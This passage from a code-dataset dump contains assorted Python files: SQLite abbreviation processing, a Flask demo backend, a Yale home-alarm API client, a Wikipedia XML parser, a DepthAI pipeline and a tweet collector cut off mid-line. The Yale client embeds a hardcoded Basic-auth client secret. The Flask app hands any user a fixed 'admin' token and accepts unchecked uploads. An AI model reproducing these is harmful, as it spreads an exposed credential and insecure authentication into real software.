curse.execute(\"SELECT stdev(freq) FROM \" + tab + \" WHERE short = ?\", (unique[0].strip(),))\n #print(unique[0])\n z=curse.fetchone()[0]\n curse.execute(\"UPDATE \" + tab + \" SET stdv = ? WHERE short = ?\", (z,unique[0].strip()))\n curse.execute(\"SELECT AVG(freq) FROM \" + tab + \" WHERE short = ?\", (unique[0].strip(),))\n zz = curse.fetchone()[0]\n curse.execute(\"UPDATE \" + tab + \" SET avrge = ? WHERE short = ?\", (zz,unique[0].strip()))\n if db != \":memory:\":\n conn.commit()\n curse.execute(\"SELECT * FROM \" + tab)\n return curse.fetchall()\n\ndef grab_table_write_table(fileIn, fileOut, abstractName, IDName): # Accepts two filepaths and two strings\n readR = csv.reader(open(fileIn, newline = \"\",encoding='utf-8-sig'), delimiter = \"\\t\") # readR will be used to read fileIn row by row (make sure it is a csv)\n firstRow = next(readR) # make sure fileIn has headers as well\n searchIndex = firstRow.index(abstractName)\n IDIndex = firstRow.index(IDName) # use searchIndex and IDIndex as indices to search and ID respectively\n processed = _process(readR,searchIndex,IDIndex,\":memory:\",\"tab\")\n out = open(fileOut, \"w\", newline = \"\",encoding='utf-8-sig')\n writeR = csv.writer(out, quoting = csv.QUOTE_ALL)\n writeR.writerow([\"Longform\",\"Shortform\",\"ID\",\"Frequency\",\"Standard Div\",\"Average\",\"Suspicious\"])\n writeR.writerows(processed)\n\ndef _grab_db_write_table(dbIn, tableIn, fileOut, abstractName, IDName):\n\n connIn = sqlite3.connect(dbIn)\n curseIn = connIn.cursor()\n curseIn.execute(\"SELECT \" + abstractName + \", \" + IDName + \" FROM \" + tableIn)\n input = curseIn.fetchall()\n processed = _process(input,0,1,\":memory:\",\"tab\")\n out = open(fileOut, \"w\", newline = \"\")\n writeR = csv.writer(out, quoting = csv.QUOTE_ALL)\n writeR.writerow([\"Longform\",\"Shortform\",\"Document-Jargon ID\",\"Frequency\",\"Standard Div\",\"Average\",\"Suspicious\"])\n writeR.writerows(processed)\n connIn.close()\n\ndef _grab_table_write_db(fileIn, dbOut, tableOut, abstractName, IDName):\n readR = csv.reader(open(fileIn, newline = \"\")) # readR will be used to read fileIn row by row (make sure it is a csv)\n firstRow = next(readR) # make sure fileIn has headers as well\n searchIndex = firstRow.index(abstractName)\n IDIndex = firstRow.index(IDName) # use searchIndex and IDIndex as indices to search and ID respectively\n _process(readR,searchIndex,IDIndex,dbOut,tableOut)\n\ndef _grab_db_write_db(dbIn, tableIn, dbOut, tableOut, abstractName, IDName):\n connIn = sqlite3.connect(dbIn)\n curseIn = connIn.cursor()\n curseIn.execute(\"SELECT \" + abstractName + \", \" + IDName + \" FROM \" + tableIn)\n input = curseIn.fetchall()\n _process(input,0,1,dbOut,tableOut)\n connIn.close()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"shortform/shortform.py","file_name":"shortform.py","file_ext":"py","file_size_in_byte":15224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224484421","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\nCORS(app)\n\n@app.route('/ping', methods=['GET'])\ndef ping_pong():\n return jsonify('pong!')\n\n@app.route('/user/login', methods=['POST'])\ndef user_login():\n data = request.get_json(force=True)\n resp = {}\n resp[\"code\"] = 20000\n resp_data = {}\n resp_data[\"token\"] = \"admin\"\n resp[\"data\"] = resp_data \n return jsonify(resp)\n\n@app.route('/user/info', methods=['GET'])\ndef user_info():\n token = request.args.get('token')\n if token == 'admin':\n resp = {\n \"code\": 20000,\n \"data\": {\n \"roles\": [\n \"admin\"\n ],\n \"name\": \"admin\",\n \"avatar\": \"/src/assets/img/avatar1.png\"\n }\n }\n else:\n resp = {\n \"code\": 50000,\n \"data\": \"登录失败\"\n }\n return jsonify(resp)\n\n@app.route('/user/logout', methods=['POST'])\ndef user_logout():\n resp = {\n \"code\": 20000,\n \"data\": \"success\"\n }\n return jsonify(resp)\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n print(request.files)\n file = request.files['file']\n file.save('./lala.xls')\n # data = request.get_json(force=True)\n # print(data)\n return '0'","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"506500101","text":"import logging\r\nimport requests\r\n\r\nfrom custom_components.doorman.log.log_wrapper import logger\r\nfrom custom_components.doorman.yale.exceptions import HttpResponseException, LoginException, UpdateException\r\nfrom custom_components.doorman.yale.updateable import Updateable\r\n\r\n\r\nfrom datetime import datetime\r\n\r\nclass YaleApi:\r\n BASE_URL = \"https://mob.yalehomesystem.co.uk/yapi\"\r\n\r\n LOGIN_URL = BASE_URL + \"/o/token/\"\r\n STATE_URL = BASE_URL + \"/api/panel/cycle/\"\r\n STATE_HISTORY_URL = BASE_URL + \"/api/event/report/?page_num=1&set_utc=1\"\r\n\r\n DOOR_UNLOCK = BASE_URL + \"/api/minigw/unlock/\"\r\n DOOR_LOCK = BASE_URL + \"/api/panel/device_control/\"\r\n\r\n YALE_AUTH_TOKEN = 'VnVWWDZYVjlXSUNzVHJhcUVpdVNCUHBwZ3ZPakxUeXNsRU1LUHBjdTpkd3RPbE15WEtENUJ5ZW1GWHV0am55eGhrc0U3V0ZFY2p0dFcyOXRaSWNuWHlSWHFsWVBEZ1BSZE1xczF4R3VwVTlxa1o4UE5ubGlQanY5Z2hBZFFtMHpsM0h4V3dlS0ZBcGZzakpMcW1GMm1HR1lXRlpad01MRkw3MGR0bmNndQ=='\r\n\r\n _LOGGER = logging.getLogger(__name__)\r\n\r\n def __init__(self, username, password):\r\n self.username = username\r\n self.password = password\r\n\r\n self.token = Token(self)\r\n\r\n @logger\r\n def login(self):\r\n return self.post(\r\n self.LOGIN_URL,\r\n data={\"grant_type\": \"password\", \"username\": self.username, \"password\": self.password},\r\n headers={\"Accept\": \"application/json\", \"Authorization\": f\"Basic {self.YALE_AUTH_TOKEN}\"})\r\n\r\n # @logger\r\n def get_state_data(self):\r\n json_message = self.get(\r\n self.STATE_URL,\r\n data=\"\",\r\n headers=YaleApi.get_token_auth_header(self.token.data))\r\n return self.extract_message(json_message)\r\n\r\n # @logger\r\n def get_state_history_data(self):\r\n json_message = self.get(\r\n self.STATE_HISTORY_URL,\r\n data={\"page_num\": 1, \"set_utc\": 1},\r\n headers=YaleApi.get_token_auth_header(self.token.data))\r\n return self.extract_message(json_message)\r\n\r\n # @logger\r\n def unlock(self, area, zone, pincode):\r\n # area=1&zone=1&pincode=xxxxxxxx\r\n return self.post(\r\n self.DOOR_UNLOCK,\r\n data={\"area\": area, \"zone\": zone, \"pincode\": pincode},\r\n headers=YaleApi.get_token_auth_header(self.token.data),)\r\n\r\n # @logger\r\n def lock(self, area, zone):\r\n # area=1&zone=1&device_type=device_type.door_lock&request_value=1\r\n return requests.post(\r\n self.DOOR_LOCK,\r\n data={\"area\": area, \"zone\": zone, \"device_type\": \"device_type.door_lock\", \"request_value\": 1},\r\n headers=YaleApi.get_token_auth_header(self.token.data))\r\n\r\n def post(self, url, data, headers):\r\n response = requests.post(url, data=data, headers=headers)\r\n self.check_http_response(response)\r\n json = self.jsonify(response)\r\n return json\r\n\r\n def get(self, url, data, headers):\r\n response = requests.get(url, data=data, headers=headers, timeout=5)\r\n self.check_http_response(response)\r\n json = self.jsonify(response)\r\n return json\r\n\r\n def check_http_response(self, response: requests.Response) -> requests.Response:\r\n if response.status_code == 200:\r\n return\r\n elif response.status_code == 401:\r\n raise LoginException(f\"Invalid credentials given: {response.text}\")\r\n else:\r\n self._LOGGER.error(f\"Unknown error retrieving http response: {response.status_code} : {response.text}\")\r\n\r\n def jsonify(self, response: requests.Response):\r\n try:\r\n json = response.json()\r\n return json\r\n except Exception as error:\r\n raise Exception(f\"Failed to convert to json, {error}\")\r\n\r\n def extract_message(self, json):\r\n status = json[\"message\"]\r\n if status != \"OK!\":\r\n raise Exception(f\"Status is not OK: {status}\")\r\n return json.get(\"data\")\r\n\r\n def get_token_auth_header(token):\r\n return {\"Authorization\": f\"Bearer {token}\"}\r\n\r\n\r\nclass Token(Updateable):\r\n def __init__(self, yale_api):\r\n super().__init__(None, -1)\r\n\r\n self.yale_api = yale_api\r\n\r\n def update(self):\r\n login_json = self.yale_api.login()\r\n token = login_json[\"access_token\"]\r\n self.time_valid = login_json[\"expires_in\"]\r\n return token\r\n","sub_path":"custom_components/doorman/yale/yale_api.py","file_name":"yale_api.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"31308548","text":"class CharacterSet:\n\n def __init__(self): \n import pandas as pd \n charlist = pd.read_csv('charlist.csv') \n charlist = list(charlist['Unicode']) \n char2ind = {x: i for i, x in enumerate(charlist)} \n ind2char = {}\n\n for char in char2ind:\n ind2char[char2ind[char]] = char\n\n self.ind2char = ind2char \n self.char2ind = char2ind\n self.num_characters = len(char2ind)\n","sub_path":"icdar/character_set.py","file_name":"character_set.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"500753884","text":"# RainingDots.py\nimport random\nimport pygame\n\npygame.init()\nscreen = pygame.display.set_mode([800,600])\nkeep_going = True\ntimer = pygame.time.Clock()\ncolors = [0]*100\nlocations = [0]*100\nsizes = [0]*100\n\n# Store random values in colors, locations, sizes\nfor n in range(100):\n colors[n] = (random.randint(0, 255), random.randint(0, 255),random.randint(0, 255),)\n locations[n] = (random.randint(0,800), random.randint(0,600))\n sizes[n] = random.randint(10, 100)\n\nwhile keep_going:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n keep_going = False\n for n in range(100):\n pygame.draw.circle(screen, colors[n], locations[n], sizes[n])\n new_x = locations[n][0] + 1 # x + 1\n new_y = locations[n][1] + 1 # y + 1\n locations[n] = (new_x, new_y)\n if new_x > 800:\n new_x -= 800\n if new_y > 600:\n new_y -= 600\n locations[n] = (new_x, new_y)\n pygame.display.update() \n timer.tick(60)\npygame.quit()\n","sub_path":"RainingDots.py","file_name":"RainingDots.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"38836962","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, api\n\n\nclass DeliveryCarrier(models.Model):\n _inherit = 'delivery.carrier'\n\n @api.model\n def _cron_check_delivery_carrier(self, sale_order_id, warehouse_id, logistics_code, weight, quantity):\n sale_order = self.env['sale.order'].browse(sale_order_id)\n warehouse = self.env['stock.warehouse'].browse(warehouse_id)\n fee = self.get_delivery_fee_by_weight(sale_order, warehouse, logistics_code, weight, quantity)\n print('发货城市:', warehouse.city_id.name)\n print('收货省:', sale_order.consignee_state_id.name)\n print('重量:', weight)\n print('快递费:', fee)\n\n\n","sub_path":"tmpaddons/cj_api_temp/models/delivery_carrier.py","file_name":"delivery_carrier.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"70458167","text":"from tkinter import *\nfrom random import choice\nfrom time import perf_counter\n\n# sx and sy are the horizontal and vertical speed of the ball\n# in pixels per animation step\nblock, ball, sx, sy = None, None, 5, 5\nfieldSize, goalSize, ballSize = 600, 25, 10\n\n# returns position of the *center* of the ball\ndef ballPosition():\n x1, y1, x2, y2 = list(field.coords(ball))\n return [(x1+x2)/2, (y1+y2)/2]\n\ndef startGame():\n global startTime, ball, block\n # remember to delete block and ball from previous game\n if block:\n field.delete(block)\n block = None\n if ball:\n field.delete(ball)\n # place ball at random\n upperLeftX = choice(list(range(fieldSize-ballSize)))\n upperLeftY = choice(list(range(fieldSize-ballSize)))\n ball = field.create_oval(upperLeftX, upperLeftY,\n upperLeftX+ballSize, upperLeftY+ballSize,\n fill='blue')\n startTime = perf_counter()\n animate()\n \ndef animate():\n global sx, sy\n pattern = 'Elapsed time: {0:.2f} seconds'\n timeDisplay['text'] = pattern.format(perf_counter()-startTime)\n x, y = ballPosition()\n hitVertical = hitBlock() and blockType == 'vertical'\n if x+sx>fieldSize or x+sx<0 or hitVertical:\n sx *= -1\n hitHorizontal = hitBlock() and blockType == 'horizontal'\n if y+sy>fieldSize or y+sy<0 or hitHorizontal:\n sy *= -1\n field.move(ball, sx, sy)\n if not inGoal():\n root.after(20, animate)\n \n# Only one block at a time; delete one before creating the next\n\ndef leftClick(event):\n global block, blockType\n if block:\n field.delete(block)\n block = field.create_rectangle(event.x-20, event.y,\n event.x+20, event.y+6,\n fill='light green')\n blockType = 'horizontal'\n \ndef rightClick(event):\n global block, blockType\n if block:\n field.delete(block)\n block = field.create_rectangle(event.x, event.y-20,\n event.x+6, event.y+20,\n fill='light green')\n blockType = 'vertical'\n \n# return True if the center of the ball is inside the\n# block’s boundary\ndef hitBlock():\n if not block:\n return False\n ballX, ballY = ballPosition()\n blockX1, blockY1, blockX2, blockY2 = field.coords(block)\n return (blockX1 <= ballX <= blockX2 and\n blockY1 <= ballY <= blockY2)\n\n# return True if the center of the ball is inside the\n# goal area\ndef inGoal():\n ballX, ballY = ballPosition()\n return 0 <= ballX <= goalSize and fieldSize-goalSize <= ballY <= fieldSize\n\n\n\nroot = Tk()\n\ntimeDisplay = Label(root)\ntimeDisplay.pack()\n\nfield = Canvas(root, width=fieldSize, height=fieldSize, bg='light blue')\nfield.pack()\n\nstartButton = Button(root, command=startGame, text='Go')\nstartButton.pack()\n\n# the goal\nfield.create_rectangle(0, fieldSize-goalSize, goalSize, fieldSize, fill='red')\n\nfield.bind('', leftClick)\nfield.bind('', rightClick)\n\n\n\nmainloop()\n\n","sub_path":"Unit11-1.py","file_name":"Unit11-1.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465146025","text":"\"\"\"WikiParser Module.\n\nCopyright (c) 2017 Gabriel Ramirez ~ Licensed under the MIT License\n\nThis module contains all the parsing and data storage aspects of the algorithm.\n\nTODO:\nBetter elimination of Wikipedia Markup\"\"\"\n\nimport os.path\nimport re\nimport string\nimport numpy\n\nfrom esa_relate import shared\nfrom esa_relate.text_model import TextModel\nfrom lxml import etree\n\n\nclass WikiParser:\n \"\"\"This class encapsulates the weighted concept lists and provides parsing/saving functionality.\n\n Attributes ending in _regex are for internal use in removing the markup in XML dumps.\n _inner_dict: {word: [(pageid, tf_score)...]}\n vocabulary: set\n namespace: int\n stop_words: set\"\"\"\n\n _internal_links_regex = re.compile(r'\\[\\[([\\(\\).a-zA-Z0-9\\s\\-\\,\\:]*)\\|?([\\(\\).a-zA-Z0-9\\s\\-\\,\\:]*)?\\]\\]')\n _formatting_regex = re.compile(r'\\&\\S+;')\n _curly_regex = re.compile(r'{{(?!infobox)[\\s\\S]*?}}')\n _tag_regex = re.compile(r'<.+?>')\n _external_link_regex = re.compile(r'\\[.*?\\]')\n _character_regex = re.compile(r'[^a-z\\s]')\n _title_regex = re.compile(r'=+[a-zA-Z]+=+')\n _infobox_regex = re.compile(r'\\|\\s[a-z]+\\s+=\\s')\n\n def __init__(self, vocabulary, stop_words=shared.STOP_WORDS):\n \"\"\"Init function.\n :param vocabulary: The vocabulary for the parser. Default is None.\n :type vocabulary: iterable\n :param stop_words: The stop words for the parser. Default is defined in esa_relate.constants\n :type stop_words: set\"\"\"\n\n self._inner_dict = {}\n self.vocabulary = {shared.stemmer.stemWord(w) for w in vocabulary}\n self.stop_words = stop_words\n self.doc_count = 0\n self.namespace = ''\n\n def parse_xml(self, path):\n \"\"\"Parses the XML dump located at the file. If vocabulary is set to None this will use a ton of memory.\n :param path: The path of the xml dump.\n :type path: str\n :returns TextModel\n :raises IOError\"\"\"\n\n if not os.path.exists(path):\n raise IOError('File does not exist at path.')\n\n with open(path) as file:\n ns_line = file.readline()\n regex = r'xmlns=\"([\\S]+)\"'\n\n for ns in re.findall(regex, ns_line):\n self.namespace = ns\n\n if self.namespace is None:\n shared.logger.warning('XML file had no namespace... proceeding but this might not work.')\n\n tag = '{{{}}}page'.format(self.namespace) if self.namespace else 'page'\n context = etree.iterparse(path, tag=tag)\n\n self._fast_iter(context)\n\n vectors = {}\n\n for word in self._inner_dict.keys():\n\n idf = numpy.log(self.doc_count / len(self._inner_dict[word]))\n tArray=[]\n\n for pageID, tf_score in self._inner_dict[word]:\n tArray.append((pageID, tf_score * idf))\n\n vectors[word] = sorted(tArray, key=lambda x: x[1], reverse=True)[:50]\n\n tm = TextModel(vectors=vectors)\n self._inner_dict.clear()\n\n return tm\n\n def _respond_to_element(self, element):\n \"\"\"Responds to fast_iter.\n :param element: The element\n :type element: lxml.Element\"\"\"\n\n self.doc_count += 1\n\n prefix = '{{{}}}'.format(self.namespace) if self.namespace else ''\n page_id = int(element.find(prefix + 'id').text)\n namespace = int(element.find(prefix + 'ns').text)\n text = element.find(prefix + 'revision').find(prefix + 'text').text\n\n if self.doc_count % 10000 == 0:\n shared.logger.info('Article {}: {}'.format(self.doc_count, page_id))\n\n if text is None:\n return\n\n if namespace != 0:\n return\n\n if len(text) < 500:\n return\n\n temp_dict = {}\n\n for word in self._parse_text(text):\n if word in temp_dict:\n temp_dict[word] += 1\n\n else:\n temp_dict[word] = 1\n\n total = sum(temp_dict.values())\n\n for word, count in temp_dict.items():\n if word in self._inner_dict:\n self._inner_dict[word].append((page_id, count/total))\n else:\n self._inner_dict[word] = [(page_id, count/total)]\n\n def _parse_text(self, text):\n \"\"\"Yields the relevant and stemmed words in the text.\n :param text: The text\n :type text: str\"\"\"\n\n text = text.lower()\n text = ''.join((l for l in text if ord(l) < 128))\n\n words = []\n\n text = self._formatting_regex.sub('', text)\n text = self._curly_regex.sub('', text)\n\n for link in self._internal_links_regex.findall(text):\n if link[1] != '':\n words.extend(link[1].split())\n\n else:\n words.extend(link[0].split())\n\n text = self._internal_links_regex.sub(' ', text)\n text = self._external_link_regex.sub(' ', text)\n text = self._tag_regex.sub(' ', text)\n text = self._curly_regex.sub(' ', text)\n text = self._title_regex.sub(' ', text)\n text = self._infobox_regex.sub(' ', text)\n text = self._character_regex.sub(' ', text)\n\n words.extend(text.split())\n\n generator = (shared.stemmer.stemWord(w.rstrip()) for w in words if (len(w) > 1 and w not in self.stop_words))\n\n for w in generator:\n if self.vocabulary is not None:\n if w in self.vocabulary:\n yield w\n else:\n yield w\n\n def _fast_iter(self, context):\n \"\"\"Iterates efficiently over tags and calls func on each. (Internal use only)\n Credit: Liza Daly - High Performance XML parsing in Python with lxml (IBM developerWorks)\n :param context: The lxml context\n :type context: lxml.etree.iterparse\"\"\"\n\n for event, elem in context:\n self._respond_to_element(elem)\n elem.clear()\n\n while elem.getprevious() is not None:\n del elem.getparent()[0]\n\n del context","sub_path":"esa_relate/wiki_parser.py","file_name":"wiki_parser.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"289303492","text":"from pathlib import Path\n\nfrom imutils.video import FPS\n\nfrom .utils import *\n\n\nclass DepthAI:\n def __init__(\n self,\n file=None,\n camera=False,\n ):\n print(\"Loading pipeline...\")\n self.file = file\n self.camera = camera\n self.fps_cam = FPS()\n self.fps_nn = FPS()\n self.create_pipeline()\n self.start_pipeline()\n self.fontScale = 1 if self.camera else 2\n self.lineType = 0 if self.camera else 3\n\n def create_pipeline(self):\n print(\"Creating pipeline...\")\n self.pipeline = depthai.Pipeline()\n\n if self.camera:\n # ColorCamera\n print(\"Creating Color Camera...\")\n self.cam = self.pipeline.createColorCamera()\n self.cam.setPreviewSize(self._cam_size[1], self._cam_size[0])\n self.cam.setResolution(\n depthai.ColorCameraProperties.SensorResolution.THE_1080_P\n )\n self.cam.setInterleaved(False)\n self.cam.setBoardSocket(depthai.CameraBoardSocket.RGB)\n self.cam.setColorOrder(depthai.ColorCameraProperties.ColorOrder.BGR)\n\n self.cam_xout = self.pipeline.createXLinkOut()\n self.cam_xout.setStreamName(\"preview\")\n self.cam.preview.link(self.cam_xout.input)\n\n self.create_nns()\n\n print(\"Pipeline created.\")\n\n def create_nns(self):\n pass\n\n def create_nn(self, model_path: str, model_name: str, first: bool = False):\n \"\"\"\n :param model_path: model path\n :param model_name: model abbreviation\n :param first: Is it the first model\n :return:\n \"\"\"\n # NeuralNetwork\n print(f\"Creating {Path(model_path).stem} Neural Network...\")\n model_nn = self.pipeline.createNeuralNetwork()\n model_nn.setBlobPath(str(Path(model_path).resolve().absolute()))\n model_nn.input.setBlocking(False)\n if first and self.camera:\n print(\"linked cam.preview to model_nn.input\")\n self.cam.preview.link(model_nn.input)\n else:\n model_in = self.pipeline.createXLinkIn()\n model_in.setStreamName(f\"{model_name}_in\")\n model_in.out.link(model_nn.input)\n\n model_nn_xout = self.pipeline.createXLinkOut()\n model_nn_xout.setStreamName(f\"{model_name}_nn\")\n model_nn.out.link(model_nn_xout.input)\n\n def start_pipeline(self):\n self.device = depthai.Device(self.pipeline)\n print(\"Starting pipeline...\")\n\n self.start_nns()\n\n if self.camera:\n self.preview = self.device.getOutputQueue(\n name=\"preview\", maxSize=4, blocking=False\n )\n\n def start_nns(self):\n pass\n\n def put_text(self, text, dot, color=(0, 0, 255), font_scale=None, line_type=None):\n font_scale = font_scale if font_scale else self.fontScale\n line_type = line_type if line_type else self.lineType\n dot = tuple(dot[:2])\n cv2.putText(\n img=self.debug_frame,\n text=text,\n org=dot,\n fontFace=cv2.FONT_HERSHEY_COMPLEX,\n fontScale=font_scale,\n color=color,\n lineType=line_type,\n )\n\n def parse(self):\n if debug:\n self.debug_frame = self.frame.copy()\n\n self.parse_fun()\n\n if debug:\n cv2.imshow(\n \"Camera_view\",\n self.debug_frame,\n )\n self.fps_cam.update()\n if cv2.waitKey(1) == ord(\"q\"):\n cv2.destroyAllWindows()\n self.fps_cam.stop()\n self.fps_nn.stop()\n print(\n f\"FPS_CAMERA: {self.fps_cam.fps():.2f} , FPS_NN: {self.fps_nn.fps():.2f}\"\n )\n raise StopIteration()\n\n def parse_fun(self):\n pass\n\n def run_video(self):\n cap = cv2.VideoCapture(str(Path(self.file).resolve().absolute()))\n while cap.isOpened():\n read_correctly, self.frame = cap.read()\n if not read_correctly:\n break\n\n try:\n self.parse()\n except StopIteration:\n break\n\n cap.release()\n\n def run_camera(self):\n while True:\n in_rgb = self.preview.tryGet()\n if in_rgb is not None:\n self.frame = in_rgb.getCvFrame()\n try:\n self.parse()\n except StopIteration:\n break\n\n @property\n def cam_size(self):\n return self._cam_size\n\n @cam_size.setter\n def cam_size(self, v):\n self._cam_size = v\n\n def run(self):\n self.fps_cam.start()\n self.fps_nn.start()\n if self.file is not None:\n self.run_video()\n else:\n self.run_camera()\n del self.device\n","sub_path":"fire_detection/depthai_utils/depthai_0021.py","file_name":"depthai_0021.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"234183649","text":"# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport funcs as func\nimport config as conf\n\nfile = conf.init()\n\n\ndef getSecTime(df, step):\n secDf = pd.DataFrame(\n columns=[\"timeStamp\", \"s1\", \"s2\", \"s3\", \"s4\", \"s5\", \"s6\", \"time\"])\n baseSec = df.ix[0, \"timeStamp\"].timestamp()\n for i, row in df.iterrows():\n if i % step != 0:\n continue\n arr = []\n arr.append(row[\"timeStamp\"])\n for idx in range(6):\n arr.append(row[idx])\n arr.append(row[\"timeStamp\"].timestamp() - baseSec)\n secDf.loc[i] = arr\n return secDf\n\n# do calibration\n\n\ndef calibrate(df):\n caliDf = pd.DataFrame(\n columns=[\"s1\", \"s2\", \"s3\", \"s4\", \"s5\", \"s6\", \"timeStamp\"])\n baseData = df.ix[0]\n baseDataArr = baseData[1:7]\n\n # print(baseDataArr)\n size = len(baseDataArr)\n\n for i, row in df.iterrows():\n caliArr = []\n for idx in range(size):\n caliArr.append(int(row[idx + 1]) - int(baseDataArr[idx]))\n if caliArr[idx] < 0:\n caliArr[idx] = 0\n caliArr.append(row[\"timeStamp\"])\n caliDf.loc[i] = caliArr\n return caliDf\n\n''' calculating posture '''\n\n\ndef calcPosture(df):\n dfPosture = pd.DataFrame(\n columns=[\"posture-F(s1,s2)\", \"posture-C(s3,s4)\", \"posture-R(s5,s6)\", \"timeStamp\"])\n for i, row in df.iterrows():\n calcArr = []\n for idx in range(0, 5, 2):\n calcArr.append(row[idx] + row[idx + 1])\n calcArr.append(row[\"timeStamp\"])\n dfPosture.loc[i] = calcArr\n return dfPosture\n\n''' calculating movement '''\n\n\ndef calcMovement(df):\n dfMov = pd.DataFrame(columns=[\"value\", \"timeStamp\"])\n for i, row in df.iterrows():\n calcArr = []\n if i < 1:\n preArr = df.ix[i]\n dfMov.loc[i] = [0, row[\"timeStamp\"]]\n continue\n for idx in range(6):\n calcArr.append(abs(int(row[idx]) - int(preArr[idx])))\n\n s = pd.Series(calcArr)\n dfMov.loc[i] = [s.mean(), row[\"timeStamp\"]]\n preArr = df.ix[i]\n return dfMov\n\ndf = pd.read_csv(file, parse_dates=['timeStamp'])\ntime = getSecTime(df, 0)\ncaliDf = calibrate(df)\nposDf = calcPosture(caliDf)\nmovDf = calcMovement(caliDf)\n\n\nfig, axes = plt.subplots(nrows=2, ncols=1)\n\nposDf.plot(figsize=(10, 5), ax=axes[0], color=[\n \"#000066\", \"blue\", \"#00CCFF\"]) # blue系\naxes[0].set_title(\"posture\", fontsize=18)\naxes[0].set_xlabel('time[s]', fontname='Times New Roman', fontsize=15)\naxes[0].set_ylabel('value', fontname='Times New Roman', fontsize=15)\naxes[0].grid(True)\naxes[0].set_ylim([0, 1600]) # 上限を100に設定\naxes[0].legend(fontsize=10)\n# subplots_adjust(right=0.7)\n\n# 2つ目のグラフ\nmovDf.plot(figsize=(10, 5), ax=axes[1], color=\"blue\")\naxes[1].set_title(\"movement\", fontsize=18)\naxes[1].set_xlabel('time[s]', fontname='Times New Roman', fontsize=15)\naxes[1].set_ylabel('value', fontname='Times New Roman', fontsize=15)\naxes[1].set_ylim([0, 100]) # 上限を100に設定\naxes[1].grid(True)\n\nplt.tight_layout() # タイトルの被りを防ぐ\n\nprint(\"completed!!\")\nplt.show()\n\nprint(movDf)\n","sub_path":"python/assr_analyze.py","file_name":"assr_analyze.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"153019643","text":"#%%\nimport os\nimport tweepy\nfrom janome import tokenizer, tokenfilter, analyzer\nfrom pathlib import Path\nimport xml.etree.ElementTree as ET\nimport time\n\n#%%\nfrom logging import getLogger, StreamHandler, DEBUG\nlogger = getLogger(__name__)\nlogger.setLevel(DEBUG)\nhandler = StreamHandler()\nhandler.setLevel(DEBUG)\nlogger.addHandler(handler)\nlogger.propagate = False\n\n#%%\nleaders = [\n \"AbeShinzo\", #自民党 安倍晋三\n \"edanoyukio0531\", #立憲民主党 枝野幸男\n \"tamakiyuichiro\", #国民民主党 玉木雄一郎\n \"gogoichiro\", #日本維新の会 松井一郎\n \"shiikazuo\"] #日本共産党 志位和夫\nfor leader in leaders:\n Path(\"get_tweets\\\\{0}\".format(leader)).mkdir(exist_ok=True)\n\n#%%\napi_key = os.environ.get(\"API_KEY\")\napi_secret = os.environ.get(\"API_SECRET\")\naccess_token = os.environ.get(\"ACCESS_TOKEN\")\naccess_token_secret = os.environ.get(\"ACCESS_TOKEN_SECRET\")\nauth = tweepy.OAuthHandler(api_key,api_secret)\nauth.set_access_token(access_token,access_token_secret)\napi = tweepy.API(auth)\n\n#%%\n\"\"\"\nt = tokenizer.Tokenizer()\nchar_filters = [analyzer.UnicodeNormalizeCharFilter(),\n analyzer.RegexReplaceCharFilter(r\"@[a-zA-Z\\d]*\",\"\"),\n analyzer.RegexReplaceCharFilter(r\"[#$]\",\"\"),\n analyzer.RegexReplaceCharFilter(r\"https?:[a-zA-Z\\d/\\.]*\",\"\")]\ntoken_filters = [tokenfilter.LowerCaseFilter()]\nt_analyzer = analyzer.Analyzer(char_filters,t,token_filters)\n\ndef get_wakati(text):\n if len(text)==0:\n return text\n wakati_text = \"\"\n for token in t_analyzer.analyze(text):\n wakati_text += token.base_form + \" \"\n return wakati_text[0:-1]\n\"\"\"\n#%%\ndef get_and_save_tweets(screen_name):\n logger.info(screen_name)\n with Path(\"get_tweets/{0}/tweets.xml\".format(screen_name)).open(\"a\",encoding=\"utf-8\") as f:\n c = tweepy.Cursor(api.user_timeline,screen_name=screen_name,exclude_replies=True,tweet_mode=\"extended\").items()\n f.write(\"\")\n i = 0\n while True:\n try:\n tweet = c.next()\n if (not tweet.retweeted) and ('RT @' not in tweet.full_text):\n logger.info(\"GET TWEET ID: {0}\".format(tweet.id))\n tweetElement = ET.Element(\"tweet\",id=str(tweet.id))\n text = get_display_text(tweet)\n textElement = ET.SubElement(tweetElement,\"text\")\n textElement.text = text\n \"\"\"\n wakati_text = get_wakati(text)\n if len(wakati_text)==0 :\n continue\n else:\n i = i + 1\n if i > 500:\n break\n wakatiElement = ET.SubElement(tweetElement,\"wakati\")\n wakatiElement.text=wakati_text\n \"\"\"\n tree = ET.ElementTree(tweetElement)\n tree.write(f,encoding=\"unicode\",xml_declaration=False)\n f.write(\"\")\n except tweepy.TweepError:\n time.sleep(60 * 15)\n continue\n except StopIteration:\n logger.warning(\"The number of tweets is low of 500.\")\n break\n \ndef get_display_text(tweet):\n s , e = 